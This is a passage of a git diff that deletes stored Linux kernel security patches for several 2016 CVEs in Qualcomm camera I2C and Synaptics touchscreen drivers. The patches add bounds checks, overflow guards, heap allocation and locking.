-@@ -418,6 +424,7 @@ static int32_t msm_camera_cci_i2c_compare(struct msm_camera_i2c_client *client,
- 	int32_t rc;
- 	uint16_t reg_data = 0;
- 	int data_len = 0;
-+
- 	switch (data_type) {
- 	case MSM_CAMERA_I2C_BYTE_DATA:
- 	case MSM_CAMERA_I2C_WORD_DATA:
-@@ -472,6 +479,7 @@ int32_t msm_camera_cci_i2c_poll(struct msm_camera_i2c_client *client,
- 	enum msm_camera_i2c_data_type data_type)
- {
- 	int32_t rc;
-+
- 	S_I2C_DBG("%s: addr: 0x%x data: 0x%x dt: %d\n",
- 		__func__, addr, data, data_type);
- 
-@@ -515,6 +523,7 @@ static int32_t msm_camera_cci_i2c_set_write_mask_data(
- {
- 	int32_t rc;
- 	uint16_t reg_data;
-+
- 	CDBG("%s\n", __func__);
- 	if (mask == -1)
- 		return 0;
-@@ -544,8 +553,10 @@ int32_t msm_camera_cci_i2c_write_conf_tbl(
- {
- 	int i;
- 	int32_t rc = -EFAULT;
-+
- 	for (i = 0; i < size; i++) {
- 		enum msm_camera_i2c_data_type dt;
-+
- 		if (reg_conf_tbl->cmd_type == MSM_CAMERA_I2C_CMD_POLL) {
- 			rc = msm_camera_cci_i2c_poll(client,
- 				reg_conf_tbl->reg_addr,
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-index ee0e9ba..2c606cc3 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011, 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011, 2013-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -505,6 +505,12 @@ int32_t msm_camera_qup_i2c_write_seq_table(struct msm_camera_i2c_client *client,
- 	client_addr_type = client->addr_type;
- 	client->addr_type = write_setting->addr_type;
- 
-+	if (reg_setting->reg_data_size > I2C_SEQ_REG_DATA_MAX) {
-+		pr_err("%s: number of bytes %u exceeding the max supported %d\n",
-+		__func__, reg_setting->reg_data_size, I2C_SEQ_REG_DATA_MAX);
-+		return rc;
-+	}
-+
- 	for (i = 0; i < write_setting->size; i++) {
- 		rc = msm_camera_qup_i2c_write_seq(client, reg_setting->reg_addr,
- 			reg_setting->reg_data, reg_setting->reg_data_size);
-@@ -560,6 +566,7 @@ static int32_t msm_camera_qup_i2c_compare(struct msm_camera_i2c_client *client,
- 	int32_t rc;
- 	uint16_t reg_data = 0;
- 	int data_len = 0;
-+
- 	switch (data_type) {
- 	case MSM_CAMERA_I2C_BYTE_DATA:
- 	case MSM_CAMERA_I2C_WORD_DATA:
-@@ -615,6 +622,7 @@ int32_t msm_camera_qup_i2c_poll(struct msm_camera_i2c_client *client,
- {
- 	int32_t rc;
- 	int i;
-+
- 	S_I2C_DBG("%s: addr: 0x%x data: 0x%x dt: %d\n",
- 		__func__, addr, data, data_type);
- 
-@@ -663,6 +671,7 @@ static int32_t msm_camera_qup_i2c_set_write_mask_data(
- {
- 	int32_t rc;
- 	uint16_t reg_data;
-+
- 	CDBG("%s\n", __func__);
- 	if (mask == -1)
- 		return 0;
-@@ -693,9 +702,11 @@ int32_t msm_camera_qup_i2c_write_conf_tbl(
- {
- 	int i;
- 	int32_t rc = -EFAULT;
-+
- 	pr_err("%s, E. ", __func__);
- 	for (i = 0; i < size; i++) {
- 		enum msm_camera_i2c_data_type dt;
-+
- 		if (reg_conf_tbl->cmd_type == MSM_CAMERA_I2C_CMD_POLL) {
- 			rc = msm_camera_qup_i2c_poll(client,
- 				reg_conf_tbl->reg_addr,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6740/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6740/3.18/0002.patch
deleted file mode 100644
index 051bfc56..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6740/3.18/0002.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From a939a87f0adf91feceb329a5c080b86e1ee333c7 Mon Sep 17 00:00:00 2001
-From: Samyukta Mogily <smogily@codeaurora.org>
-Date: Thu, 1 Sep 2016 18:16:50 +0530
-Subject: msm: sensor: Avoid potential stack overflow
-
-Add a check to validate the user input data is not
-greater than expected stack buffer size to avoid out
-of bounds array accesses
-
-CRs-Fixed: 1056307
-Change-Id: Ifd1f4e828373535fdf963aad22b217ae880c778c
-Signed-off-by: Samyukta Mogily <smogily@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c | 6 ++++++
- drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c | 6 ++++++
- 2 files changed, 12 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-index 7315327..99d4b654 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-@@ -272,6 +272,12 @@ int32_t msm_camera_cci_i2c_write_seq_table(
- 	client_addr_type = client->addr_type;
- 	client->addr_type = write_setting->addr_type;
- 
-+	if (reg_setting->reg_data_size > I2C_SEQ_REG_DATA_MAX) {
-+		pr_err("%s: number of bytes %u exceeding the max supported %d\n",
-+		__func__, reg_setting->reg_data_size, I2C_SEQ_REG_DATA_MAX);
-+		return rc;
-+	}
-+
- 	for (i = 0; i < write_setting->size; i++) {
- 		rc = msm_camera_cci_i2c_write_seq(client, reg_setting->reg_addr,
- 			reg_setting->reg_data, reg_setting->reg_data_size);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-index f542ec2..eced0ce 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-@@ -290,6 +290,12 @@ int32_t msm_camera_qup_i2c_write_seq_table(struct msm_camera_i2c_client *client,
- 	client_addr_type = client->addr_type;
- 	client->addr_type = write_setting->addr_type;
- 
-+	if (reg_setting->reg_data_size > I2C_SEQ_REG_DATA_MAX) {
-+		pr_err("%s: number of bytes %u exceeding the max supported %d\n",
-+		__func__, reg_setting->reg_data_size, I2C_SEQ_REG_DATA_MAX);
-+		return rc;
-+	}
-+
- 	for (i = 0; i < write_setting->size; i++) {
- 		rc = msm_camera_qup_i2c_write_seq(client, reg_setting->reg_addr,
- 			reg_setting->reg_data, reg_setting->reg_data_size);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6741/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6741/3.10/0001.patch
deleted file mode 100644
index 48b2979e..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6741/3.10/0001.patch
+++ /dev/null
@@ -1,137 +0,0 @@
-From 80a1d9978c11f76bbe6d2e622bf2ded18f27e34f Mon Sep 17 00:00:00 2001
-From: VijayaKumar T M <vtmuni@codeaurora.org>
-Date: Wed, 7 Sep 2016 12:53:43 +0530
-Subject: msm: camera: Restructure data handling to be more robust
-
-Use dynamic array allocation instead of static array to
-prevent stack overflow.
-User-supplied number of bytes may result in integer overflow.
-To fix this we check that the num_byte isn't above 8K size.
-
-CRs-Fixed: 1060554
-Change-Id: I9b05b846e5cc3a62b1a0a67be529f09abc764796
-Signed-off-by: VijayaKumar T M <vtmuni@codeaurora.org>
----
- .../msm/camera_v2/sensor/io/msm_camera_cci_i2c.c   |  6 ++++
- .../msm/camera_v2/sensor/io/msm_camera_qup_i2c.c   | 39 ++++++++++++++++++++--
- 2 files changed, 43 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-index 07b7e32..f970233 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-@@ -71,6 +71,12 @@ int32_t msm_camera_cci_i2c_read_seq(struct msm_camera_i2c_client *client,
- 		|| num_byte == 0)
- 		return rc;
- 
-+	if (num_byte > I2C_REG_DATA_MAX) {
-+		pr_err("%s: Error num_byte:0x%x exceeds 8K max supported:0x%x\n",
-+			__func__, num_byte, I2C_REG_DATA_MAX);
-+		return rc;
-+	}
-+
- 	buf = kzalloc(num_byte, GFP_KERNEL);
- 	if (!buf) {
- 		pr_err("%s:%d no memory\n", __func__, __LINE__);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-index ee0e9ba..5fd11eb 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-@@ -102,7 +102,7 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- 	enum msm_camera_i2c_data_type data_type)
- {
- 	int32_t rc = -EFAULT;
--	unsigned char buf[client->addr_type+data_type];
-+	unsigned char *buf = NULL;
- 
- 	if ((client->addr_type != MSM_CAMERA_I2C_BYTE_ADDR
- 		&& client->addr_type != MSM_CAMERA_I2C_WORD_ADDR)
-@@ -110,6 +110,17 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- 		&& data_type != MSM_CAMERA_I2C_WORD_DATA))
- 		return rc;
- 
-+	if (client->addr_type > UINT_MAX - data_type) {
-+		pr_err("%s: integer overflow prevented\n", __func__);
-+		return rc;
-+	}
-+
-+	buf = kzalloc(client->addr_type+data_type, GFP_KERNEL);
-+	if (!buf) {
-+		pr_err("%s:%d no memory\n", __func__, __LINE__);
-+		return -ENOMEM;
-+	}
-+
- 	if (client->addr_type == MSM_CAMERA_I2C_BYTE_ADDR) {
- 		buf[0] = addr;
- 	} else if (client->addr_type == MSM_CAMERA_I2C_WORD_ADDR) {
-@@ -119,6 +130,8 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- 	rc = msm_camera_qup_i2c_rxdata(client, buf, data_type);
- 	if (rc < 0) {
- 		S_I2C_DBG("%s fail\n", __func__);
-+		kfree(buf);
-+		buf = NULL;
- 		return rc;
- 	}
- 
-@@ -128,6 +141,8 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- 		*data = buf[0] << 8 | buf[1];
- 
- 	S_I2C_DBG("%s addr = 0x%x data: 0x%x\n", __func__, addr, *data);
-+	kfree(buf);
-+	buf = NULL;
- 	return rc;
- }
- 
-@@ -135,7 +150,7 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- 	uint32_t addr, uint8_t *data, uint32_t num_byte)
- {
- 	int32_t rc = -EFAULT;
--	unsigned char buf[client->addr_type+num_byte];
-+	unsigned char *buf = NULL;
- 	int i;
- 
- 	if ((client->addr_type != MSM_CAMERA_I2C_BYTE_ADDR
-@@ -143,6 +158,22 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- 		|| num_byte == 0)
- 		return rc;
- 
-+	if (num_byte > I2C_REG_DATA_MAX) {
-+		pr_err("%s: Error num_byte:0x%x exceeds 8K max supported:0x%x\n",
-+			__func__, num_byte, I2C_REG_DATA_MAX);
-+		return rc;
-+	}
-+	if (client->addr_type > UINT_MAX - num_byte) {
-+		pr_err("%s: integer overflow prevented\n", __func__);
-+		return rc;
-+	}
-+
-+	buf = kzalloc(client->addr_type+num_byte, GFP_KERNEL);
-+	if (!buf) {
-+		pr_err("%s:%d no memory\n", __func__, __LINE__);
-+		return -ENOMEM;
-+	}
-+
- 	if (client->addr_type == MSM_CAMERA_I2C_BYTE_ADDR) {
- 		buf[0] = addr;
- 	} else if (client->addr_type == MSM_CAMERA_I2C_WORD_ADDR) {
-@@ -152,6 +183,8 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- 	rc = msm_camera_qup_i2c_rxdata(client, buf, num_byte);
- 	if (rc < 0) {
- 		S_I2C_DBG("%s fail\n", __func__);
-+		kfree(buf);
-+		buf = NULL;
- 		return rc;
- 	}
- 
-@@ -161,6 +194,8 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- 		S_I2C_DBG("Byte %d: 0x%x\n", i, buf[i]);
- 		S_I2C_DBG("Data: 0x%x\n", data[i]);
- 	}
-+	kfree(buf);
-+	buf = NULL;
- 	return rc;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6741/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6741/3.18/0002.patch
deleted file mode 100644
index bab8e7f4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6741/3.18/0002.patch
+++ /dev/null
@@ -1,137 +0,0 @@
-From d291eebd8e43bba3229ae7ef9146a132894dc293 Mon Sep 17 00:00:00 2001
-From: Samyukta Mogily <smogily@codeaurora.org>
-Date: Thu, 8 Sep 2016 17:35:52 +0530
-Subject: msm: camera: Restructure data handling to be more robust
-
-Use dynamic array allocation instead of static array to
-prevent stack overflow.
-User-supplied number of bytes may result in integer overflow.
-To fix this we check that the num_byte isn't above 8K size.
-
-CRs-Fixed: 1060554
-Change-Id: I407b5ec8cdc2ac7f3b491644418d3eb1101ce65a
-Signed-off-by: Samyukta Mogily <smogily@codeaurora.org>
----
- .../msm/camera_v2/sensor/io/msm_camera_cci_i2c.c   |  6 ++++
- .../msm/camera_v2/sensor/io/msm_camera_qup_i2c.c   | 39 ++++++++++++++++++++--
- 2 files changed, 43 insertions(+), 2 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-index a4ee504..27d4f5e 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_cci_i2c.c
-@@ -69,6 +69,12 @@ int32_t msm_camera_cci_i2c_read_seq(struct msm_camera_i2c_client *client,
- 		|| num_byte == 0)
- 		return rc;
- 
-+	if (num_byte > I2C_REG_DATA_MAX) {
-+			pr_err("%s: Error num_byte:0x%x exceeds 8K max supported:0x%x\n",
-+			__func__, num_byte, I2C_REG_DATA_MAX);
-+		return rc;
-+	}
-+
- 	buf = kzalloc(num_byte, GFP_KERNEL);
- 	if (!buf) {
- 		pr_err("%s:%d no memory\n", __func__, __LINE__);
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-index 7a0fb97..7d21866 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/io/msm_camera_qup_i2c.c
-@@ -73,7 +73,7 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- 	enum msm_camera_i2c_data_type data_type)
- {
- 	int32_t rc = -EFAULT;
--	unsigned char buf[client->addr_type+data_type];
-+	unsigned char *buf = NULL;
- 
- 	if ((client->addr_type != MSM_CAMERA_I2C_BYTE_ADDR
- 		&& client->addr_type != MSM_CAMERA_I2C_WORD_ADDR)
-@@ -81,6 +81,17 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- 		&& data_type != MSM_CAMERA_I2C_WORD_DATA))
- 		return rc;
- 
-+	if (client->addr_type > UINT_MAX - data_type) {
-+			pr_err("%s: integer overflow prevented\n", __func__);
-+			return rc;
-+	}
-+
-+	buf = kzalloc(client->addr_type+data_type, GFP_KERNEL);
-+	if (!buf) {
-+			pr_err("%s:%d no memory\n", __func__, __LINE__);
-+			return -ENOMEM;
-+	}
-+
- 	if (client->addr_type == MSM_CAMERA_I2C_BYTE_ADDR) {
- 		buf[0] = addr;
- 	} else if (client->addr_type == MSM_CAMERA_I2C_WORD_ADDR) {
-@@ -90,6 +101,8 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- 	rc = msm_camera_qup_i2c_rxdata(client, buf, data_type);
- 	if (rc < 0) {
- 		S_I2C_DBG("%s fail\n", __func__);
-+		kfree(buf);
-+		buf = NULL;
- 		return rc;
- 	}
- 
-@@ -99,6 +112,8 @@ int32_t msm_camera_qup_i2c_read(struct msm_camera_i2c_client *client,
- 		*data = buf[0] << 8 | buf[1];
- 
- 	S_I2C_DBG("%s addr = 0x%x data: 0x%x\n", __func__, addr, *data);
-+	kfree(buf);
-+	buf = NULL;
- 	return rc;
- }
- 
-@@ -106,7 +121,7 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- 	uint32_t addr, uint8_t *data, uint32_t num_byte)
- {
- 	int32_t rc = -EFAULT;
--	unsigned char buf[client->addr_type+num_byte];
-+	unsigned char *buf = NULL;
- 	int i;
- 
- 	if ((client->addr_type != MSM_CAMERA_I2C_BYTE_ADDR
-@@ -114,6 +129,22 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- 		|| num_byte == 0)
- 		return rc;
- 
-+	if (num_byte > I2C_REG_DATA_MAX) {
-+			pr_err("%s: Error num_byte:0x%x exceeds 8K max supported:0x%x\n",
-+					__func__, num_byte, I2C_REG_DATA_MAX);
-+			return rc;
-+	}
-+	if (client->addr_type > UINT_MAX - num_byte) {
-+			pr_err("%s: integer overflow prevented\n", __func__);
-+			return rc;
-+	}
-+
-+	buf = kzalloc(client->addr_type+num_byte, GFP_KERNEL);
-+	if (!buf) {
-+			pr_err("%s:%d no memory\n", __func__, __LINE__);
-+			return -ENOMEM;
-+	}
-+
- 	if (client->addr_type == MSM_CAMERA_I2C_BYTE_ADDR) {
- 		buf[0] = addr;
- 	} else if (client->addr_type == MSM_CAMERA_I2C_WORD_ADDR) {
-@@ -123,6 +154,8 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- 	rc = msm_camera_qup_i2c_rxdata(client, buf, num_byte);
- 	if (rc < 0) {
- 		S_I2C_DBG("%s fail\n", __func__);
-+		kfree(buf);
-+		buf = NULL;
- 		return rc;
- 	}
- 
-@@ -132,6 +165,8 @@ int32_t msm_camera_qup_i2c_read_seq(struct msm_camera_i2c_client *client,
- 		S_I2C_DBG("Byte %d: 0x%x\n", i, buf[i]);
- 		S_I2C_DBG("Data: 0x%x\n", data[i]);
- 	}
-+	kfree(buf);
-+	buf = NULL;
- 	return rc;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6742/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6742/ANY/0001.patch
deleted file mode 100644
index 9c676bce..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6742/ANY/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 94f4b81da69ec72486476adb59d7c818bd4ffbd0 Mon Sep 17 00:00:00 2001
-From: chengengjia <chengjia4574@gmail.com>
-Date: Wed, 10 Aug 2016 17:34:43 +0800
-Subject: [PATCH] input: synaptics: Add checks of user input data
-
-Add checks of the user input count to avoid possible heap overflow
-
-Bug: 30799828
-Change-Id: I896492b18c4ace6565fb9edd5cbf51f363ce157b
-Signed-off-by: chengengjia <chengjia4574@gmail.com>
-Signed-off-by: Andrew Chant <achant@google.com>
----
- drivers/input/touchscreen/synaptics_fw_update.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/input/touchscreen/synaptics_fw_update.c b/drivers/input/touchscreen/synaptics_fw_update.c
-index 8e457ccaa5245..170a202590ad4 100644
---- a/drivers/input/touchscreen/synaptics_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_fw_update.c
-@@ -1736,6 +1736,13 @@ static ssize_t fwu_sysfs_store_image(struct file *data_file,
- 		return -EAGAIN;
- 	}
- 
-+	if (count > fwu->image_size - fwu->data_pos) {
-+		dev_err(&fwu->rmi4_data->i2c_client->dev,
-+				"%s: Not enough space in buffer\n",
-+				__func__);
-+		return -EINVAL;
-+	}
-+
- 	memcpy((void *)(&fwu->ext_data_source[fwu->data_pos]),
- 			(const void *)buf,
- 			count);
diff --git a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6745/ANY/0001.patch
deleted file mode 100644
index dcdb4835..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0001.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From 80dd4267f644c7ba9657df52f6bce42f0bef1b4e Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Wed, 14 Sep 2016 15:25:23 -0700
-Subject: [PATCH] input: synaptics: defer sysfs creation during init
-
-sysfs entries are created which reference fwu->fwu_work.
-defer the creation of these sysfs entries until the end of the init
-function, after fwu->fwu_work has been initialized.
-
-Change-Id: Ib7d5304ec2990454486e2b1d28b640a174c83d12
-Bug: 31252388
-Signed-off-by: Andrew Chant <achant@google.com>
----
- drivers/input/touchscreen/synaptics_fw_update.c | 28 ++++++++++++-------------
- 1 file changed, 14 insertions(+), 14 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_fw_update.c b/drivers/input/touchscreen/synaptics_fw_update.c
-index 170a202590ad4..79b3a780550b8 100644
---- a/drivers/input/touchscreen/synaptics_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_fw_update.c
-@@ -2325,7 +2325,20 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 	fwu->initialized = true;
- 	fwu->polling_mode = false;
- 
--	retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj,
-+	fwu->ts_info = kzalloc(RMI4_INFO_MAX_LEN, GFP_KERNEL);
-+	if (!fwu->ts_info) {
-+		dev_err(&rmi4_data->i2c_client->dev, "Not enough memory\n");
-+		goto exit_free_ts_info;
-+	}
-+
-+	synaptics_rmi4_update_debug_info();
-+
-+#ifdef INSIDE_FIRMWARE_UPDATE
-+	fwu->fwu_workqueue = create_singlethread_workqueue("fwu_workqueue");
-+	INIT_DELAYED_WORK(&fwu->fwu_work, synaptics_rmi4_fwu_work);
-+#endif
-+
-+        retval = sysfs_create_bin_file(&rmi4_data->i2c_client->dev.kobj,
- 			&dev_attr_data);
- 	if (retval < 0) {
- 		dev_err(&rmi4_data->i2c_client->dev,
-@@ -2357,19 +2370,6 @@ static int synaptics_rmi4_fwu_init(struct synaptics_rmi4_data *rmi4_data)
- 		goto exit_remove_attrs;
- 	}
- 
--	fwu->ts_info = kzalloc(RMI4_INFO_MAX_LEN, GFP_KERNEL);
--	if (!fwu->ts_info) {
--		dev_err(&rmi4_data->i2c_client->dev, "Not enough memory\n");
--		goto exit_free_ts_info;
--	}
--
--	synaptics_rmi4_update_debug_info();
--
--#ifdef INSIDE_FIRMWARE_UPDATE
--	fwu->fwu_workqueue = create_singlethread_workqueue("fwu_workqueue");
--	INIT_DELAYED_WORK(&fwu->fwu_work, synaptics_rmi4_fwu_work);
--#endif
--
- 	return 0;
- exit_free_ts_info:
- 	debugfs_remove(temp);
diff --git a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2016-6745/ANY/0002.patch
deleted file mode 100644
index e2c7abee..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6745/ANY/0002.patch
+++ /dev/null
@@ -1,444 +0,0 @@
-From 9397e20764da2fdffdfe20e35cb78211753b83cc Mon Sep 17 00:00:00 2001
-From: Andrew Chant <achant@google.com>
-Date: Wed, 14 Sep 2016 17:21:48 -0700
-Subject: [PATCH] input: synaptics: prevent sysfs races
-
-concurrent sysfs calls on the fw updater can cause
-ugly race conditions.  Return EBUSY on concurrent sysfs calls.
-
-For sysfs calls which generate deferred work, prevent
-the deferred work from running concurrently with other
-sysfs calls.
-
-Change-Id: Ie33add946fbcca8309998e4cb7cb01525c667c7e
-Signed-off-by: Andrew Chant <achant@google.com>
-Bug: 31252388
----
- drivers/input/touchscreen/synaptics_fw_update.c | 144 ++++++++++++++++++------
- 1 file changed, 109 insertions(+), 35 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_fw_update.c b/drivers/input/touchscreen/synaptics_fw_update.c
-index 79b3a780550b8..ffa992b829a5a 100644
---- a/drivers/input/touchscreen/synaptics_fw_update.c
-+++ b/drivers/input/touchscreen/synaptics_fw_update.c
-@@ -22,6 +22,7 @@
- #include <linux/slab.h>
- #include <linux/i2c.h>
- #include <linux/interrupt.h>
-+#include <linux/mutex.h>
- #include <linux/delay.h>
- #include <linux/input.h>
- #include <linux/firmware.h>
-@@ -296,6 +297,7 @@ struct synaptics_rmi4_fwu_handle {
- static struct synaptics_rmi4_fwu_handle *fwu;
- 
- DECLARE_COMPLETION(fwu_remove_complete);
-+DEFINE_MUTEX(fwu_sysfs_mutex);
- 
- static unsigned int extract_uint(const unsigned char *ptr)
- {
-@@ -1713,34 +1715,47 @@ static ssize_t fwu_sysfs_show_image(struct file *data_file,
- 		char *buf, loff_t pos, size_t count)
- {
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-+	ssize_t retval;
-+
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 
- 	if (count < fwu->config_size) {
- 		dev_err(&rmi4_data->i2c_client->dev,
- 				"%s: Not enough space (%zu bytes) in buffer\n",
- 				__func__, count);
--		return -EINVAL;
-+		retval = -EINVAL;
-+		goto show_image_exit;
- 	}
- 
- 	memcpy(buf, fwu->read_config_buf, fwu->config_size);
--
--	return fwu->config_size;
-+	retval = fwu->config_size;
-+show_image_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_store_image(struct file *data_file,
- 		struct kobject *kobj, struct bin_attribute *attributes,
- 		char *buf, loff_t pos, size_t count)
- {
-+	ssize_t retval;
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (!fwu->ext_data_source) {
- 		dev_err(&fwu->rmi4_data->i2c_client->dev,
- 			"Cannot use this without setting imagesize!\n");
--		return -EAGAIN;
-+		retval = -EAGAIN;
-+		goto store_image_exit;
- 	}
- 
- 	if (count > fwu->image_size - fwu->data_pos) {
- 		dev_err(&fwu->rmi4_data->i2c_client->dev,
- 				"%s: Not enough space in buffer\n",
- 				__func__);
--		return -EINVAL;
-+		retval = -EINVAL;
-+		goto store_image_exit;
- 	}
- 
- 	memcpy((void *)(&fwu->ext_data_source[fwu->data_pos]),
-@@ -1749,8 +1764,11 @@ static ssize_t fwu_sysfs_store_image(struct file *data_file,
- 
- 	fwu->data_buffer = fwu->ext_data_source;
- 	fwu->data_pos += count;
-+	retval = count;
- 
--	return count;
-+store_image_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_image_name_store(struct device *dev,
-@@ -1758,11 +1776,15 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev,
- {
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 	char *strptr;
-+	ssize_t retval;
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 
- 	if (count >= NAME_BUFFER_SIZE) {
- 		dev_err(&rmi4_data->i2c_client->dev,
- 			"Input over %d characters long\n", NAME_BUFFER_SIZE);
--		return -EINVAL;
-+		retval = -EINVAL;
-+		goto image_name_store_exit;
- 	}
- 
- 	strptr = strnstr(buf, ".img",
-@@ -1770,21 +1792,32 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev,
- 	if (!strptr) {
- 		dev_err(&rmi4_data->i2c_client->dev,
- 			"Input is not valid .img file\n");
--		return -EINVAL;
-+		retval = -EINVAL;
-+		goto image_name_store_exit;
- 	}
- 
- 	strlcpy(rmi4_data->fw_image_name, buf, count);
--	return count;
-+	retval = count;
-+
-+image_name_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_image_name_show(struct device *dev,
- 		struct device_attribute *attr, char *buf)
- {
-+	ssize_t retval;
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 	if (strnlen(fwu->rmi4_data->fw_image_name, NAME_BUFFER_SIZE) > 0)
--		return snprintf(buf, PAGE_SIZE, "%s\n",
-+		retval = snprintf(buf, PAGE_SIZE, "%s\n",
- 			fwu->rmi4_data->fw_image_name);
- 	else
--		return snprintf(buf, PAGE_SIZE, "No firmware name given\n");
-+		retval = snprintf(buf, PAGE_SIZE, "No firmware name given\n");
-+
-+	mutex_unlock(&fwu_sysfs_mutex);
-+	return retval;
- }
- 
- static ssize_t fwu_sysfs_force_reflash_store(struct device *dev,
-@@ -1794,14 +1827,17 @@ static ssize_t fwu_sysfs_force_reflash_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
